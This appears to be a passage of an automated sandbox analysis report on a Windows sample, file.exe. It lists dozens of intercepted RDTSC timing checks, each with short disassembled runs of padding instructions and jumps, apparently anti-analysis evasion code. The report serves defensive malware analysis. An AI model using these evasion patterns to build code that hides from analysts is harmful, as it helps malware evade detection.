Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 339EFC second address: 339F06 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4E04C4CBFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33A313 second address: 33A332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4E04B2CB28h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33A332 second address: 33A351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F4E04C4CC24h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4E04C4CBFCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33A351 second address: 33A355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33A355 second address: 33A35F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33A35F second address: 33A365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33A5E1 second address: 33A625 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4E04C4CC15h 0x00000008 jmp 00007F4E04C4CC09h 0x0000000d jc 00007F4E04C4CBF6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4E04C4CBFBh 0x0000001c je 00007F4E04C4CBFEh 0x00000022 pushad 0x00000023 popad 0x00000024 jng 00007F4E04C4CBF6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33A625 second address: 33A647 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4E04B2CB27h 0x00000008 jc 00007F4E04B2CB16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33A647 second address: 33A64F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33A7E6 second address: 33A7EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33A7EB second address: 33A80C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4E04C4CBF6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F4E04C4CC02h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33A96C second address: 33A989 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB29h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33A989 second address: 33A993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33C2B6 second address: 33C2C6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4E04B2CB22h 0x00000008 js 00007F4E04B2CB16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 340BFC second address: 340C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E04C4CC02h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3476ED second address: 3476F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3476F3 second address: 347722 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4E04C4CBF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F4E04C4CC0Ch 0x00000012 jmp 00007F4E04C4CC06h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 347722 second address: 347726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 347726 second address: 34772A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 34772A second address: 34773A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4E04B2CB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 34773A second address: 347775 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4E04C4CBF6h 0x00000008 jmp 00007F4E04C4CBFCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F4E04C4CC02h 0x00000017 jng 00007F4E04C4CBF6h 0x0000001d popad 0x0000001e pushad 0x0000001f jbe 00007F4E04C4CBF6h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 347775 second address: 34777B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3478EB second address: 3478EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3478EF second address: 3478F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 34B91A second address: 34B934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CBFCh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F4E04C4CBF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3512C4 second address: 3512CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3512CA second address: 3512D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3512D0 second address: 3512DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 350CAA second address: 350CC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CC09h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 350CC7 second address: 350CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 350E47 second address: 350E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 350E4D second address: 350E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 350E51 second address: 350E55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 350E55 second address: 350E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4E04B2CB1Dh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 ja 00007F4E04B2CB16h 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 350FBC second address: 350FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F4E04C4CC01h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4E04C4CC02h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 350FEA second address: 351009 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35C11B second address: 35C125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35C125 second address: 35C129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35C129 second address: 35C15B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4E04C4CC03h 0x0000000c jmp 00007F4E04C4CC06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35C2AE second address: 35C2B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35C2B2 second address: 35C2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36165A second address: 36165E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36165E second address: 361670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F4E04C4CBF6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361670 second address: 361674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361674 second address: 361680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361680 second address: 361688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361688 second address: 36168E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36168E second address: 361692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36101D second address: 361021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361021 second address: 36102D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36102D second address: 361031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 362E8F second address: 362E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4E04B2CB1Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 362E9F second address: 362EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007F4E04C4CBF6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 362EAB second address: 362ED2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a jmp 00007F4E04B2CB27h 0x0000000f pop ecx 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 362ED2 second address: 362EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4E04C4CC07h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B097 second address: 37B0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4E04B2CB16h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jo 00007F4E04B2CB16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B777 second address: 37B7B0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4E04C4CBF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4E04C4CC06h 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F4E04C4CC03h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37B7B0 second address: 37B7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 39B626 second address: 39B63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jnl 00007F4E04C4CBF6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 39D6D9 second address: 39D6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 39D201 second address: 39D207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 39D368 second address: 39D37D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4E04B2CB1Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 39D37D second address: 39D3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E04C4CC03h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F4E04C4CC06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3A070C second address: 3A0712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3A0712 second address: 3A0718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3A0718 second address: 3A071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3A29E7 second address: 3A29EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BA287 second address: 3BA291 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4E04B2CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BA56A second address: 3BA56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BA56E second address: 3BA572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BA572 second address: 3BA578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BAA70 second address: 3BAA84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4E04B2CB16h 0x0000000a jmp 00007F4E04B2CB1Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BAC02 second address: 3BAC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4E04C4CBF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BAC0C second address: 3BAC22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BAC22 second address: 3BAC42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CC07h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BAD87 second address: 3BADA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Bh 0x00000007 jnc 00007F4E04B2CB16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F4E04B2CB16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BB00A second address: 3BB010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BB010 second address: 3BB016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BB016 second address: 3BB01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BB01A second address: 3BB031 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F4E04B2CB16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BB031 second address: 3BB035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BCB56 second address: 3BCB94 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4E04B2CB2Ch 0x00000008 jbe 00007F4E04B2CB24h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F4E04B2CB1Ch 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F4E04B2CB16h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BCB94 second address: 3BCBAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4E04C4CC02h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BCBAC second address: 3BCBB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BF82C second address: 3BF832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BF832 second address: 3BF836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BFBCE second address: 3BFBD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BFBD2 second address: 3BFC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 sub dword ptr [ebp+1245B5F4h], edi 0x0000000e push dword ptr [ebp+124536C7h] 0x00000014 mov edx, ebx 0x00000016 jp 00007F4E04B2CB1Ch 0x0000001c sbb edx, 5622049Dh 0x00000022 call 00007F4E04B2CB19h 0x00000027 push edi 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d popad 0x0000002e pop edi 0x0000002f push eax 0x00000030 jmp 00007F4E04B2CB21h 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F4E04B2CB23h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BFC31 second address: 3BFC47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F4E04C4CBF8h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BFC47 second address: 3BFC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3C0EDF second address: 3C0EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3C0EEB second address: 3C0EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3C2BA5 second address: 3C2BA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3C2BA9 second address: 3C2BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4E04B2CB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3C2BBB second address: 3C2BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3C2BBF second address: 3C2BC9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4E04B2CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3C4688 second address: 3C468E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
